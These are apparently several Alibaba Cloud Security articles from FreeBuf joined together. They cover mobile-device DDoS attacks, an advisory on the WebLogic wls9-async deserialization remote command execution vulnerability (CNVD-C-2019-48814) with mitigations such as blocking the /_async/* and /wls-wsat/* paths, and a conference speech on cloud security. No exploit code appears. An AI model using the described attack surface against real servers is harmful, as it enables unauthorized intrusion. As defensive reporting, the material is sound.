除了能恶意操控移动设备发起攻击之外,黑灰产还可以通过在APP中植入恶意代码,私自发送扣费类短信,借助运营商的短信支付通道偷取用户资费;获取用户的通讯录、地理位置、身份证、银行卡等敏感信息,使用户受到广告骚扰、电信诈骗等,甚至还有可能被黑灰产盗用身份造成更大的损失。

如何应对这种新兴DDoS攻击威胁?

在PC肉鸡时代,企业抵御肉鸡DDoS攻击的做法相对简单粗暴:

1.检测单元:请求频率 

2.执行动作:限速和黑名单 

3.防御逻辑:请求频率过高后开始进行源限速或拉黑源IP

在无法有效防御的情况下,还需要人工介入抓包分析,根据攻击具体情况配置防护规则,但这种响应方式相对较慢,业务普遍已经严重受损。

当海量移动设备成为新的攻击源,黑灰产可以轻松绕过上述防御逻辑。企业不应该再对“限速+黑名单就能一招制敌”抱有幻想,而应该采用更为纵深、智能的防护手段:

丰富攻击流量识别的维度,将每个请求实时的解析出多维度的检测单元; 防护策略的执行需要与多维度的识别相匹配,需要有精细、灵活、丰富的访问控制单元,让各个维度有机组合,层层过滤攻击流量; 机器智能替代人工排查,提升响应速度,降低业务中断时间。

尽管黑灰产只是升级了攻击源,但企业针对这一改变所要做的安全防御工作量巨大,需要尽早行动起来做好准备。对于个人用户而言,为了保障设备安全和数据隐私安全,阿里云安全团队建议,切勿从非正规渠道安装未经审核的APP,让自己手机沦为黑灰产的工具,造成不必要的麻烦;安装APP时请仔细确认请求授予的权限,若发现APP请求了与功能不符的高风险权限,如“访问通讯录”、“发送短信”等,很可能存在问题,请谨慎安装。

*本文作者:阿里云安全,转载请注明来自FreeBuf.COM

近日,阿里云安全团队监测到,由国家信息安全漏洞共享平台(CNVD)收录的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)被攻击者利用,在未授权的情况下可远程执行命令。该漏洞曾经因为使用HTTP协议,而非t3协议,被黑客利用进行大规模的挖矿行为。

目前该漏洞对WebLogic 10.X和WebLogic 12.1.3两个版本均有影响。Oracle尚未发布官方补丁,漏洞细节和真实PoC也未公开。

一、WebLogic Server漏洞是啥?

WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,被广泛应用于保险、证券、银行等金融领域。

二、WebLogic Server漏洞发展及防御过程

2019年4月17日,CNVD公布编号为CNVD-C-2019-48814的WebLogic漏洞,指出该漏洞受影响的war包为bea_wls9_async_response.war。wls9-async组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该war包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。

阿里云Web应用防火墙(简称WAF)监测到该漏洞后立即进行分析,发现除bea_wls9_async_response.war之外,wls-wsat.war也受到该漏洞影响。4月21日,阿里云针对该漏洞更新了默认防御规则,开启拦截,实现用户域名接入即可防护。

4月23日CNVD追加通告称,该漏洞受影响的war包不仅仅包括bea_wls9_async_response.war ,还包括wls-wsat.war。该war包提供了WLS-WebServices的路由,而WLS-WebServices功能使用了XMLDecoder来解析XML数据。阿里云WAF无需更新任何规则,即可默认防护。

漏洞攻击演示

漏洞攻击演示

目前,阿里云监测到,云上已经出现针对该漏洞的大规模扫描行为,攻击流量图如下,阿里云WAF用户均未受影响。

利用该漏洞的攻击流量图

利用该漏洞的攻击流量图

三、安全建议

由于Oracle官方暂未发布补丁,阿里云安全团队给出如下解决方案:

· 请使用WebLogic Server构建网站的信息系统运营者进行自查,发现存在漏洞后,立即删除受影响的两个war包,并重启WebLogic服务;

· 因为受影响的两个war包覆盖的路由较多,如下图所示,所以建议通过策略禁止 /_async/* 及 /wls-wsat/* 路径的URL访问;

wls-wsat.war的路由

wls-wsat.war的路由

bea_wls9_async_response.war的路由

bea_wls9_async_response.war的路由

阿里云WAF可以对该漏洞进行默认防护,您可以选择接入阿里云WAF进行防护,避免该漏洞造成更大的损失。

企业在享受数字化转型带来利好的同时,其面临的安全问题也愈发复杂。一方面,外部威胁不断升级,近期利用海量移动设备发起DDoS攻击的案例表明,黑灰产作案手法也在随着时代的发展而不断演进;另一方面,内部安全隐患层出不穷,员工自带设备办公增加企业攻击面,因开发者不小心泄露的访问凭证等问题时有发生。

“安全基础建设变得更为关键,将成为企业数字化转型过程中的安全基石。而云的原生能力将帮助企业构建更高等级的基础安全能力。”阿里云智能安全事业部总经理肖力在2019西湖论剑·网络安全大会主题演讲中指出。

微信图片_20190422161304.jpg

阿里云智能安全事业部总经理肖力现场演讲

据Gartner判断,到2020年,与传统数据中心相比,公共云的安全能力将帮助企业至少降低60%的安全事件。未来企业上云是总体趋势,数据显示,2019年,已经有84%的中国企业表示愿意上云。

基于云上数据处理能力、强大的算力、网络边界清晰的看见能力等各方面的原生优势,云上环境可以帮助企业从身份认证授权管理、网络访问控制、基线运营、默认安全流程、全局数据流程保护、威胁检测及自动化响应等各个方面输出最佳安全实践,从底层保障企业的系统、应用、网络等全方位安全,提升基础安全建设水位。

肖力指出,安全应该内置到整个产品和业务生产流程中去,把原来的事后安全运营工作前置,做到事前预防、自动化响应和主动防御。阿里云的诸多实践案例显示,在云上做0-day漏洞的应急响应经常会比官方系统商提前知晓并上线防御策略,从而保障云上用户安全。

安全厂商的产品逐渐走向融合是另一个明显的行业趋势,通过自动化响应建立完整的安全闭环已经成为共识。阿里云近期推出的云安全中心,基于云上的威胁情报能力、日志采集能力、大数据能力,可以帮助企业实现云上资产和威胁情况的全局可见,让用户从单点安全运营变为全局管理,并支持线上线下混合云环境;不仅如此,云安全中心通过与安全产品的联动,还可以实现自动化主动防御,让企业享受到真正意义上的安全闭环服务,使安全运营成为企业基础设施化的能力之一。

目前阿里云安全已经服务了数十万企业用户,覆盖各行各业。“我们也希望通过整个云平台的安全能力,帮助用户更好的在数字化转型过程中解决安全问题,做到真正意义上的普惠安全。”肖力最后表示。